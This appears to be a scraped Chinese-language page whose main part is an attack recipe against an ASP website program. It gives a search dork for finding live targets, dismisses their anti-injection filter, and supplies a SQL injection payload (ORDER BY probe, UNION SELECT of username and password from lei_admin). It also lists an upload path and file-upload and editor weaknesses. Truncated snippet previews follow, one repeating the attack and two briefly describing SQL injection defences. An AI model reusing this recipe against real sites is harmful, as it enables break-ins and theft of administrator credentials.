關鍵字:inurl:pro_show.asp?showid=
該程式採用楓葉通用防注入1.0asp版,此防注入完全雞肋,該型別**程式pro_show.asp
有cookies注入或者變型注入,注入前可以先判斷一下字段數:order by xx
注入語句:and 1=1 union select 1,username,3,4,5,6,7,8,9,10,password,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from lei_admin
欄位數看個人判斷的為準
上傳路徑admin/upimg/
有些後台有雙檔案上傳漏洞:admin/inc/upfiletwo.asp
有些後台還有eweb編輯器
楓葉防注入程式漏洞
關鍵字 inurl pro show.asp?showid 該程式採用楓葉通用防注入1.0asp版,此防注入完全雞肋,該型別 程式pro show.asp 有cookies注入或者變型注入,注入前可以先判斷一下字段數 order by xx 注入語句 and 1 1 union select 1,u...
sql 防注入漏洞
一 為了防止sql 注入漏洞,應使用sql引數 以下 當 textbox1.text 是 1 or 1 1 時就會產生 sql 注入漏洞 private void button1 click object sender,eventargs e 修改 使用sql引數可以防止漏洞 private voi...
SQL注入漏洞的防案
1 輸入過濾,對於整數,判斷變數是否符合 0 9 的值 其他限定值,也可以進行合法性校驗 對於字串,對sql語句特殊字元進行轉義 單引號轉成兩個單引號,雙引號轉成兩個雙引號 mysql也有類似的轉義函式mysql escape string和mysql real escape string。asp的...